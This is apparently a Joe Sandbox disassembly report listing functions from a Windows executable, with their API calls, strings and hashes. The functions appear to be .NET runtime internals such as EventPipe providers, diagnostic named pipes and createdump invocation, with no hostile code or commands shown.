String ID: %-30s %d$%-30s %zu$cache_load:%zu used, %zu total, utilization %#5.2f%%$stub data$cache_entry_counter$cache_entry_space$cache_entry_used$site_counter$site_write$site_write_mono$site_write_poly$stub_lookup_counter$stub_mono_counter$stub_poly_counter$stub_space
API String ID: 1354552572-2971453786
Opcode ID: dd29b4d6cc14e667a863772e0242a2871869be11986d083ab5f6d2d8cedc08e1
Instruction ID: cbe7ca816e9c1c3b1ce603b962039a6fba5837be62248f30f013cecddfed02a8
Opcode Fuzzy Hash: dd29b4d6cc14e667a863772e0242a2871869be11986d083ab5f6d2d8cedc08e1
Instruction Fuzzy Hash: C7F159B2504344AFD301CF54DC4AF9B77E8BF49704F04052AF649CA2A2E7B6EA19CB65

Function 007EACC0 Relevance: 37.9, APIs: 17, Strings: 8, Instructions: 420memorystringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(DynamicClass,BBFE6088,?,?), ref: 007EAD0D
HeapFree.KERNEL32(00000000,?,?,?,ILStubClass,BBFE6088,?,?), ref: 007EADA7
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00D028A8,?,?), ref: 007EADE1
HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,00000000,?,?,?), ref: 007EAEDF
HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,00000000,?,?,?), ref: 007EAEF9
strlen.API-MS-WIN-CRT-STRING-L1-1-0({inst-stub},?,?,00000000,?,?,?,?,?,00000000,?,?,?), ref: 007EAF2A
HeapFree.KERNEL32(00000000,{inst-stub},?,?,?,?), ref: 007EAF84
strlen.API-MS-WIN-CRT-STRING-L1-1-0({unbox-stub},?,?,00000000,?,?,?,?,?,00000000,?,?,?), ref: 007EAF99
HeapFree.KERNEL32(00000000,{unbox-stub},?,?,?,?), ref: 007EAFF3
strlen.API-MS-WIN-CRT-STRING-L1-1-0({method-shared},?,?,00000000,?,?,?,?,?,00000000,?,?,?), ref: 007EB00F
HeapFree.KERNEL32(00000000,?,?,?,{shared},?,?,00000000,?,?,?,?,?,00000000,?), ref: 007EB0A8
strlen.API-MS-WIN-CRT-STRING-L1-1-0({requires-mt-arg},?,?,00000000,?,?,?,?,?,00000000,?,?,?), ref: 007EB0BE
HeapFree.KERNEL32(00000000,{requires-mt-arg},?,?,?,?), ref: 007EB118
strlen.API-MS-WIN-CRT-STRING-L1-1-0({requires-mdesc-arg},?,?,00000000,?,?,?,?,?,00000000,?,?,?), ref: 007EB145
HeapFree.KERNEL32(00000000,{requires-mdesc-arg},?,?,?,?), ref: 007EB19F
HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,00000000,?,?,?), ref: 007EB1BF
HeapFree.KERNEL32(00000000,00D028A8,?,?,00000000,?,?,?,?,?,00000000,?,?,?), ref: 007EB1E2

Part of subcall function 007B3D30: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,BBFE6088,00000000,BBFE6088,?,00000000,00C13F6D,000000FF,?,007EA84B,?,00D02170,?,?,00000200), ref: 007B3D5E

Strings

{requires-mdesc-arg}, xrefs: 007EB140, 007EB156, 007EB196
{unbox-stub}, xrefs: 007EAF94, 007EAFAA, 007EAFEA
{requires-mt-arg}, xrefs: 007EB0B9, 007EB0CF, 007EB10F
ILStubClass, xrefs: 007EAD67
{inst-stub}, xrefs: 007EAF25, 007EAF3B, 007EAF7B
DynamicClass, xrefs: 007EAD08, 007EAD1E, 007EAD9E
{shared}, xrefs: 007EB071
{method-shared}, xrefs: 007EB00A, 007EB020, 007EB09F

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap$strlen
String ID: DynamicClass$ILStubClass${inst-stub}${method-shared}${requires-mdesc-arg}${requires-mt-arg}${shared}${unbox-stub}
API String ID: 2745055037-2528749595
Opcode ID: c6fb1bbd532f518b0b3c308a8e885adb34b7b321581ca683397aaf0ae15eba62
Instruction ID: ac3afbdca557488fab991c19a259da4cf8d2079b5e94e2dd83c9d8b3c03a4bc7
Opcode Fuzzy Hash: c6fb1bbd532f518b0b3c308a8e885adb34b7b321581ca683397aaf0ae15eba62
Instruction Fuzzy Hash: 1F028CB0D01289EEDF11CFA9C949BEEBFF4AF09304F144258E465A7290D778AA05DB61

Function 00A288D0 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 266stringmemoryCOMMON

Download Yara Rule

APIs

strtoull.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,00000000,00000010,00000000,?,00000000), ref: 00A289C6
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00A289D5
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,00000000,0000000A,00000000,?,00000000), ref: 00A28A0F
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00A28A1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(Microsoft-Windows-DotNETRuntimeRundown,00000000,00000000,?,00000000), ref: 00A28A5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,00A286F4,00000001,00000001,00000000,00000000,00000000,00000000,?,00000000), ref: 00A28AEA
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,00A286F4,00000001,00000001,00000000,00000000,00000000,00000000,?,00000000), ref: 00A28AFB
HeapFree.KERNEL32(00000000,?,00000000,?,00A286F4,00000001,00000001,00000000,00000000,00000000,00000000,?,00000000), ref: 00A28B17
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(Microsoft-Windows-DotNETRuntime,00000000,?,00000000), ref: 00A28B66
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(Microsoft-Windows-DotNETRuntimePrivate,C14FCCBD,00000004,00000005,00000000), ref: 00A28B88
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(Microsoft-DotNETCore-SampleProfiler,4002000B,00000000,00000005,00000000), ref: 00A28BAB

Strings

Microsoft-Windows-DotNETRuntimeRundown, xrefs: 00A28A5A
Microsoft-Windows-DotNETRuntimePrivate, xrefs: 00A28B83
Microsoft-Windows-DotNETRuntime, xrefs: 00A28B61
Microsoft-DotNETCore-SampleProfiler, xrefs: 00A28BA6

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: free$_strdup$FreeHeapstrcmpstrtoulstrtoull
String ID: Microsoft-DotNETCore-SampleProfiler$Microsoft-Windows-DotNETRuntime$Microsoft-Windows-DotNETRuntimePrivate$Microsoft-Windows-DotNETRuntimeRundown
API String ID: 1615690062-209705412
Opcode ID: eaf3c6b923a66f01b5c7fbfc07b795f27d3e53a1abb96744c567c6f67d42ed0c
Instruction ID: 9cf2b61ec63d70b8e046d707b8a9d87eb87d3c4077e92fe1b501e30a04b92225
Opcode Fuzzy Hash: eaf3c6b923a66f01b5c7fbfc07b795f27d3e53a1abb96744c567c6f67d42ed0c
Instruction Fuzzy Hash: 9F91B270E02224ABDB20CF6CEC85BAEBBB1AF45700F140169F951BB381DF74AD458B94

Function 009AC390 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 94pipeCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,00000000,Function_00321A90,?,?,009AC1C4,Function_00321A90), ref: 009AC3A9
GetLastError.KERNEL32(?,009AC1C4,Function_00321A90), ref: 009AC3C4
DisconnectNamedPipe.KERNEL32(?,00000000,Function_00321A90,?,?,009AC1C4,Function_00321A90), ref: 009AC413
GetLastError.KERNEL32(?,009AC1C4,Function_00321A90), ref: 009AC422
CloseHandle.KERNEL32(?,00000000,Function_00321A90,?,?,009AC1C4,Function_00321A90), ref: 009AC43E
GetLastError.KERNEL32(?,009AC1C4,Function_00321A90), ref: 009AC44D
CloseHandle.KERNEL32(?,00000000,Function_00321A90,?,?,009AC1C4,Function_00321A90), ref: 009AC479
GetLastError.KERNEL32(?,009AC1C4,Function_00321A90), ref: 009AC488

Strings

Failed to close pipe handle, xrefs: 009AC454
Failed to close overlap event handle, xrefs: 009AC48F
Closing without cleaning underlying handles, xrefs: 009AC3E8
Failed to disconnect NamedPipe, xrefs: 009AC429
Failed to IPC ownership sentinel handle, xrefs: 009AC3CB

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ErrorLast$CloseHandle$DisconnectNamedPipe
String ID: Closing without cleaning underlying handles$Failed to IPC ownership sentinel handle$Failed to close overlap event handle$Failed to close pipe handle$Failed to disconnect NamedPipe
API String ID: 3346832071-3329839343
Opcode ID: 93e459158d6ca73c55da221fd4fbf21289d86c11cb274f88fe23e0663fb05827
Instruction ID: 4a467d0a6ac8b6e330c3d70c39398b2de873463ddad91080ea66769283074bc8
Opcode Fuzzy Hash: 93e459158d6ca73c55da221fd4fbf21289d86c11cb274f88fe23e0663fb05827
Instruction Fuzzy Hash: 8C31E4B1A406516BC3291B75AD5C7EDBB68FB46B22F144311E531CA2F0CBB08D558BE4

Function 00A2D350 Relevance: 21.4, APIs: 14, Instructions: 350memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 00A2D398
HeapAlloc.KERNEL32(03400000,00000000,00000070,00000000,00000000,00000000), ref: 00A2D3B0
GetProcessHeap.KERNEL32 ref: 00A2D43D
HeapAlloc.KERNEL32(03400000,00000000,000000F0), ref: 00A2D45D
HeapFree.KERNEL32(00000000,?,00019000,?), ref: 00A2D4BD
HeapFree.KERNEL32(00000000,?), ref: 00A2D4D3
GetProcessHeap.KERNEL32(?,00019000,?), ref: 00A2D51F
HeapAlloc.KERNEL32(03400000,00000000,000000F0,?,00019000,?), ref: 00A2D546
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00019000,?), ref: 00A2D600
HeapAlloc.KERNEL32(03400000,00000000,0000002C,?,?,?,?,?,?,?,?,?,?,00019000,?), ref: 00A2D618

Part of subcall function 0096F430: GetProcessHeap.KERNEL32(BBFE6088,00000000,00000000,00C13410,000000FF,?,00983D82), ref: 0096F45E
Part of subcall function 0096F430: RtlAllocateHeap.NTDLL(03400000,00000000,00000030,BBFE6088,00000000,00000000,00C13410,000000FF,?,00983D82), ref: 0096F47A

GetSystemTime.KERNEL32(?), ref: 00A2D6D2
QueryPerformanceFrequency.KERNEL32(?), ref: 00A2D727
GetCurrentProcessId.KERNEL32 ref: 00A2D754
GetSystemInfo.KERNEL32(?), ref: 00A2D773

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heap$Process$Alloc$FreeSystem$AllocateCurrentFrequencyInfoPerformanceQueryTime
String ID:
API String ID: 3274788086-0
Opcode ID: 2771f1a4633cf96cf1ecc91b20394dfbd8e3c065f0046d0df1972278e5f7cac8
Instruction ID: 0c96cea1808126fbf87d7e286cad179d395738b1ec68bd825353e24bfb5cf4bb
Opcode Fuzzy Hash: 2771f1a4633cf96cf1ecc91b20394dfbd8e3c065f0046d0df1972278e5f7cac8
Instruction Fuzzy Hash: 93D1AB70A00741EBD721DF69E849B6AB7F0BF48300F104539E946DB782EBB9E944CB95

Function 00A2CD00 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,CommandLine,000000FF,00000000,00000000,00000000,00000000,00000004,00000000), ref: 00A2CD4A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A28F18), ref: 00A2CD5A
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,CommandLine,000000FF,00000000,?), ref: 00A2CD7A
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00A2CD85
HeapFree.KERNEL32(00000000,?,00000004,00000000), ref: 00A2CE94
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000004,00000000), ref: 00A2CEA2
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000004,00000000), ref: 00A2CEB0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000004,00000000), ref: 00A2CEC1
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000004,00000000), ref: 00A2CECF

Strings

Microsoft-DotNETCore-EventPipe, xrefs: 00A2CD22, 00A2CD35
CommandLine, xrefs: 00A2CD3F, 00A2CD6F
ArchInformation, xrefs: 00A2CDED
ProcessInfo, xrefs: 00A2CE0A
OSInformation, xrefs: 00A2CDD9

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: free$ByteCharMultiWide$FreeHeapmalloc
String ID: ArchInformation$CommandLine$Microsoft-DotNETCore-EventPipe$OSInformation$ProcessInfo
API String ID: 897903226-198322117
Opcode ID: 45b584391b00b5d5c8d403009a6a0e8aa59ccc0f255102dcf645b1eef7586f1e
Instruction ID: 9040e9f27c367865a3955479df8c7d59545f8ab96bb0a7637ed9f872bb4209e9
Opcode Fuzzy Hash: 45b584391b00b5d5c8d403009a6a0e8aa59ccc0f255102dcf645b1eef7586f1e
Instruction Fuzzy Hash: 315162B0E00215ABEB109FB9FD55BAEBBB5AF08710F144139F905E6281DB74DA048BA5

Function 00A27DC0 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 306stringCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,?,?,00A28295,?,?,BBFE6088,?,00000000), ref: 00A27E6A
GetCommandLineW.KERNEL32(00000000,?,?,?,?,?,00A28295,?,?,BBFE6088,?,00000000), ref: 00A27EA6
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,03400FF8,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00A28295,?), ref: 00A27EC8
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,00A28295,?,?,BBFE6088,?,00000000), ref: 00A27EDA
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,03400FF8,000000FF,00000000,?,00000000,00000000,?,?,?,?,00A28295,?,?,BBFE6088), ref: 00A27EFB
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,00A28295,?,?,BBFE6088,?,00000000), ref: 00A27F06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(BBFE6088,00000000,?,?,?,?,00A28295,?,?,BBFE6088,?,00000000), ref: 00A27F21
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,00A28295,?,?,BBFE6088,?,00000000), ref: 00A27F44
SetEvent.KERNEL32(?,?,00000000,?,?,?,?,00A28295,?,?,BBFE6088,?,00000000), ref: 00A27F92
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(Microsoft-Windows-DotNETRuntimeRundown,Microsoft-Windows-DotNETRuntimeRundown,?,00000000,?,?,?,?,00A28295,?,?,BBFE6088,?,00000000), ref: 00A2800D

Part of subcall function 00A2F7D0: QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,00A27FCE,?,00000000,?,?,?,?,00A28295), ref: 00A2F7FF

Part of subcall function 007D0350: SleepEx.KERNEL32(00000001,00000000,?,?,00A278A0), ref: 007D03C2
Part of subcall function 007D0350: SwitchToThread.KERNEL32(00000000,00000111,00000000,?,?,00A278A0), ref: 007D03C8

Part of subcall function 00A2A300: QueryPerformanceCounter.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00A2A6E1), ref: 00A2A33E

Part of subcall function 00A2DDF0: HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 00A2DEC2

Strings

Microsoft-Windows-DotNETRuntimeRundown, xrefs: 00A28003, 00A28008, 00A28040

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: ByteCharCounterFreeMultiPerformanceQueryWidefreestrcmp$CommandEventHeapLibraryLineSleepSwitchThreadmalloc
String ID: Microsoft-Windows-DotNETRuntimeRundown
API String ID: 3870175671-930870680
Opcode ID: ae3a075e884665a4b5e9c4b9b38b033db63efb46ded2a8cca56180ae1984b142
Instruction ID: 4a7606c89ce503b07aa40d9020ec1b664188254200c9c75272fa1caa5b5c7eb9
Opcode Fuzzy Hash: ae3a075e884665a4b5e9c4b9b38b033db63efb46ded2a8cca56180ae1984b142
Instruction Fuzzy Hash: DEB1E330A05320DFDB24EF29ED51B6E7BA6AF84710F148178E801AB396DB74DD44CBA1

Function 009ABC60 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000124,?,?,00000000,?,00A332EC,?,00000000,?,00000000), ref: 009ABC6F
GetCurrentProcessId.KERNEL32 ref: 009ABCB9
_swprintf.LIBCMT ref: 009ABCCB
CloseHandle.KERNEL32(?,Failed to generate the named pipe name,00000000), ref: 009ABCFE
DisconnectNamedPipe.KERNEL32(?,Failed to generate the named pipe name,00000000), ref: 009ABD28
CloseHandle.KERNEL32(?,Failed to generate the named pipe name,00000000), ref: 009ABD34
CloseHandle.KERNEL32(?,Failed to generate the named pipe name,00000000), ref: 009ABD50
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,Failed to generate the named pipe name,00000000), ref: 009ABD89

Strings

Failed to generate the named pipe name, xrefs: 009ABCE8
\\.\pipe\%s, xrefs: 009ABCB2
\\.\pipe\dotnet-diagnostic-%d, xrefs: 009ABCC0

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CloseHandle$CurrentDisconnectNamedPipeProcess_swprintfcallocfree
String ID: Failed to generate the named pipe name$\\.\pipe\%s$\\.\pipe\dotnet-diagnostic-%d
API String ID: 2348038466-3731596089
Opcode ID: 6487c781f894410e3467ce257b8b0cd46703f22f6476e8805129e4bfc9576e47
Instruction ID: 364998cb3413e4b66f3e7a7c7d626fa837f9117cad03dc3c8814666195fb2f5b
Opcode Fuzzy Hash: 6487c781f894410e3467ce257b8b0cd46703f22f6476e8805129e4bfc9576e47
Instruction Fuzzy Hash: 9F31A6B0500B409BD2345B389C4DBDBBBA8FB06335F204B1DF5BA862D1CBB595458BE1

Function 00982AC0 Relevance: 18.2, APIs: 12, Instructions: 186threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00020008,FFFFFFFF,BBFE6088,?,00000000), ref: 00982B5D
OpenProcessToken.ADVAPI32(00000000), ref: 00982B64
GetLastError.KERNEL32 ref: 00982B9A
CloseHandle.KERNEL32(FFFFFFFF), ref: 00982BC7
SetThreadToken.ADVAPI32(00000000,?), ref: 00982BE5
CloseHandle.KERNEL32(?,?,?,?,0098321A,?,?,InprocServer32,?,?,?), ref: 00982C0D

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CloseHandleProcessToken$CurrentErrorLastOpenThread
String ID:
API String ID: 1361886223-0
Opcode ID: 985ccc775bb343351f8ebb2e002f73c9113ff2f1bcb95094e54584196c24c643
Instruction ID: b22269f53c7839c2cc47f23f21aa709739ff0976472da450c273757189cb6a0d
Opcode Fuzzy Hash: 985ccc775bb343351f8ebb2e002f73c9113ff2f1bcb95094e54584196c24c643
Instruction Fuzzy Hash: 6F719E71E01259DFDB20DFA9D844BAEBBB8EF49324F144269E811E73D0D7758A00CBA4

Function 007627B0 Relevance: 16.8, APIs: 3, Strings: 8, Instructions: 319memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009865E0: GetModuleFileNameW.KERNEL32(00710000,00000000), ref: 00986666
Part of subcall function 009865E0: GetLastError.KERNEL32 ref: 00986697
Part of subcall function 009865E0: SetLastError.KERNEL32(00000000,00000000), ref: 009867A1

HeapFree.KERNEL32(00000000,00000000,BBFE6088,?,?), ref: 0076293D
HeapFree.KERNEL32(00000000,00000000,?,0000005C,BBFE6088,?,?), ref: 00762B12
HeapFree.KERNEL32(00000000,00000000,createdump.exe,BBFE6088,?,?), ref: 00762C18

Strings

--withheap, xrefs: 00762BBF
--name , xrefs: 00762B94
--diag, xrefs: 00762BE7
createdump.exe, xrefs: 00762B7E
--triage, xrefs: 00762BC6
--full, xrefs: 00762BCD
%s, xrefs: 00762BD3
--normal, xrefs: 00762BB8, 00762BD2

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
